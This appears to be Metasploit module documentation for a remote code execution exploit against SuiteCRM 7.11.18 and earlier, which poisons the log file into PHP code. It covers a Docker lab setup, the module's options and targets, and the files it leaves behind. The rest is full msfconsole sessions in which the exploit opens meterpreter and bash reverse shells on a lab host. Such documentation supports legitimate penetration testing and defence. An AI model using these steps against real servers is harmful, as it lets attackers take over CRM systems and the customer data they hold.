M. Cory Billington
5.7 KiB
Vulnerable Application
SuiteCRM versions 7.11.18 and below. https://docs.suitecrm.com/admin/releases/7.11.x/#_7_11_18
Installation
Installation: https://docs.suitecrm.com/admin/installation-guide/downloading-installing/
The fastest way to stand up a quick test instance is with docker. Bitnami hosts docker images and docker-compose.yml files.
Docker installation: https://docs.docker.com/get-docker/
curl -sSL https://raw.githubusercontent.com/bitnami/bitnami-docker-suitecrm/master/docker-compose.yml > docker-compose.yml
docker-compose up -d
You'll just want to edit the docker-compose file to pull the 7.11.18 release before you run docker-compose up -d. Example docker-compose.yml below:
suitecrm:
image: docker.io/bitnami/suitecrm:7.11.18
Verification Steps
Example steps in this format (is also in the PR):
- Install the application
- Start msfconsole
- Do:
use exploit/linux/http/suitecrm_log_file_rce - Do:
set USER [username] - Do:
set PASS [password] - Do:
set RHOSTS [IP] - Do:
set SRVPORT [IP] - Do:
set LHOST [IP] - Do:
exploit - You should get a shell.
Options
USER
Username of a user with administrator access to the SuiteCRM instance
PASS
Password of the user with administrator access to the SuiteCRM instance
TARGETURI
The base path to SuiteCRM. The default is /
RESTORECONF
Restore the system log file settings to the default value of suitecrm.log. Default value is true
LASTNAME
Last name you'd like to set the admin user back to after running the exploit. Default is admin.
WRITABLEDIR
Any writable directory for paylod to be written. Only used for targets 0 ( x64 meterpreter ) and 2 ( x86 meterpreter )
Targets
Default is 0 with a payload of linux/x64/meterpreter_reverse_tcp
Exploit targets:
Id Name
-- ----
0 Linux (x64)
1 Linux (cmd)
Currently, this supports
linux/x64/meterpreter_reverse_tcpcmd/unix/bash_reverse_tcp
There is some encoding/escaping on the php poisoning into the log file, so php code is limited. I would also presume an x86 meterpreter would run fine, but I haven't tested it. I did test a cmd/unix/bash_reverse_udp and it worked fine. I would presume most cmd payloads will work contingent on the required tools being available on the victim machine.
Artifacts/IOC's
Target 0 is going to leave a random, 8 character alphanumeric PHP file such as this
ryl2bLse.pHp
in the webroot and it will leave a random alphanumeric 8 character file in WRITABLEDIR (/tmp by default) similar to this
uG0QjRbK
Operators: keep an eye out for the last couple of lines of output
[!] This exploit may require manual cleanup of 'eTHsm71W.pHp' on the target
[!] This exploit may require manual cleanup of '/tmp/54N6HA1E' on the target
Scenarios
SuiteCRM 7.11.18 Check + Target 0 (linux x64 meterpreter)
msf6 > use exploit/linux/http/suitecrm_log_file_rce
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/suitecrm_log_file_rce) > set RHOSTS 192.168.122.29
RHOSTS => 192.168.122.29
msf6 exploit(linux/http/suitecrm_log_file_rce) > set USER admin
USER => admin
msf6 exploit(linux/http/suitecrm_log_file_rce) > set PASS admin
PASS => admin
msf6 exploit(linux/http/suitecrm_log_file_rce) > set SRVHOST 192.168.122.125
SRVHOST => 192.168.122.125
msf6 exploit(linux/http/suitecrm_log_file_rce) > set LHOST 192.168.122.125
LHOST => 192.168.122.125
msf6 exploit(linux/http/suitecrm_log_file_rce) > check
[*] Authenticating as admin
[+] Authenticated as: admin
[+] admin has administrative rights.
[+] SuiteCRM Version 7.11.18
[*] 192.168.122.29:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/suitecrm_log_file_rce) > exploit
[*] Started reverse TCP handler on 192.168.122.125:4444
[*] Using URL: http://192.168.122.125:8080/NzzKmKY
[*] Authenticating as admin
[+] Authenticated as: admin
[+] admin has administrative rights.
[*] Modifying systems setting file
[*] Poisoning log file
[*] Executing php code in log file: fxg8pi1C.pHp
[+] 192.168.122.29:80 - Payload sent!
[*] Meterpreter session 1 opened (192.168.122.125:4444 -> 192.168.122.29:43346) at 2021-05-21 22:52:15 -0500
[*] Restoring log file to default configuration
[*] Server stopped.
[!] This exploit may require manual cleanup of 'fxg8pi1C.pHp' on the target
[!] This exploit may require manual cleanup of '/tmp/9yCGovF5' on the target
meterpreter > getuid
Server username: daemon @ bb77d61a4df1 (uid=1, gid=1, euid=1, egid=1)
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 172.21.0.3 - Meterpreter session 1 closed. Reason: User exit
SuiteCRM 7.11.18 Check + Target 1 (Unix bash reverse TCP shell)
This was run immediately after the previous scenario. Initialization is exactly the same.
msf6 exploit(linux/http/suitecrm_log_file_rce) > sessions -i
Active sessions
===============
No active sessions.
msf6 exploit(linux/http/suitecrm_log_file_rce) > set target 1
target => 1
msf6 exploit(linux/http/suitecrm_log_file_rce) > run
[*] Started reverse TCP handler on 192.168.122.125:4444
[*] Using URL: http://192.168.122.125:8080/Kle8QoPV
[*] Authenticating as admin
[+] Authenticated as: admin
[+] admin has administrative rights.
[*] Modifying systems setting file
[*] Poisoning log file
[*] Executing php code in log file: 1cOyYGE3.pHp
[+] 192.168.122.29:80 - Payload sent!
[*] Command shell session 2 opened (192.168.122.125:4444 -> 192.168.122.29:43366) at 2021-05-21 22:53:03 -0500
[*] Restoring log file to default configuration
[*] Server stopped.
[!] This exploit may require manual cleanup of '1cOyYGE3.pHp' on the target
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
whoami
daemon
exit
[*] 192.168.122.29 - Command shell session 2 closed.